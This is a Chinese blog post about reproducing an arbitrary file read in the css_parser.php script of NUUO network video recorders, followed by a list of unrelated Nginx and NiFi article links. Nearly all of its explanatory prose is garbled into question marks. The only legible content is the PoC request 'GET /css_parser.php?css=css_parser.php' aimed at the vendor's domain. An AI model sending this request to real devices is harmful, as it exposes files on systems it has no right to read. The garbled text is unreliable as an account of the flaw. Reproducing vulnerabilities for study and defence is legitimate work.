NUUO网络视频录像机 css_parser.php 任意文件读取漏洞复现-白红宇

NUUO网络视频录像机 css_parser.php 任意文件读取漏洞复现

阅读量：795 次

发布时间：2023-02-17

本文共 764 字，大约阅读时间需要 2 分钟。

0x01 NUUO???????????

NUUO????????Network Video Recorder???NVR??NUUO Inc.???????????????????????????????????????????????????????IP????????????????????????????????????NUUO NVR??????????????????????????

0x02 ????

???????????????????css_parser.php???????????????????????????????????????????????????????????????????????????????????

0x03 ??????

????????????????

????????URL??GET?????????

GET /css_parser.php?css=css_parser.php HTTP/1.1

??????????????????User-Agent??????

Host: www.nuuo.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:xx.xx.xx) Gecko/20100101 Firefox/xx.xx

0x04 ????

?????????PoC?Proof of Concept?????????????

GET /css_parser.php?css=css_parser.php HTTP/1.1  Host: www.nuuo.com

??????????css_parser.php???????????????????????????????????????

转载地址：http://hwnfk.baihongyu.com/

你可能感兴趣的文章

nginx负载均衡的五种算法

查看>>

Nginx运维与实战（二）-Https配置

Nginx配置代理解决本地html进行ajax请求接口跨域问题

查看>>

Nginx配置参数中文说明

查看>>

Nginx配置好ssl，但$_SERVER[‘HTTPS‘]取不到值

查看>>

Nginx配置如何一键生成

查看>>

Nginx配置实例-负载均衡实例：平均访问多台服务器

查看>>

NHibernate学习[1]

查看>>

NIFI1.21.0_Mysql到Mysql增量CDC同步中_日期类型_以及null数据同步处理补充---大数据之Nifi工作笔记0057

查看>>

NIFI1.21.0_NIFI和hadoop蹦了_200G集群磁盘又满了_Jps看不到进程了_Unable to write in /tmp. Aborting----大数据之Nifi工作笔记0052

查看>>

NIFI1.21.0通过Postgresql11的CDC逻辑复制槽实现_指定表多表增量同步_增删改数据分发及删除数据实时同步_通过分页解决变更记录过大问题_02----大数据之Nifi工作笔记0054

查看>>

NIFI从MySql中增量同步数据_通过Mysql的binlog功能_实时同步mysql数据_配置binlog_使用处理器抓取binlog数据_实际操作01---大数据之Nifi工作笔记0040

查看>>

NIFI从MySql中增量同步数据_通过Mysql的binlog功能_实时同步mysql数据_配置数据路由_实现数据插入数据到目标数据库_实际操作03---大数据之Nifi工作笔记0042

查看>>

NIFI同步MySql数据_到SqlServer_错误_驱动程序无法通过使用安全套接字层(SSL)加密与SQL Server_Navicat连接SqlServer---大数据之Nifi工作笔记0047

查看>>

Nifi同步过程中报错create_time字段找不到_实际目标表和源表中没有这个字段---大数据之Nifi工作笔记0066

查看>>

NIFI大数据进阶_离线同步MySql数据到HDFS_02_实际操作_splitjson处理器_puthdfs处理器_querydatabasetable处理器---大数据之Nifi工作笔记0030

查看>>

NIFI大数据进阶_连接与关系_设置数据流负载均衡_设置背压_设置展现弯曲_介绍以及实际操作---大数据之Nifi工作笔记0027

查看>>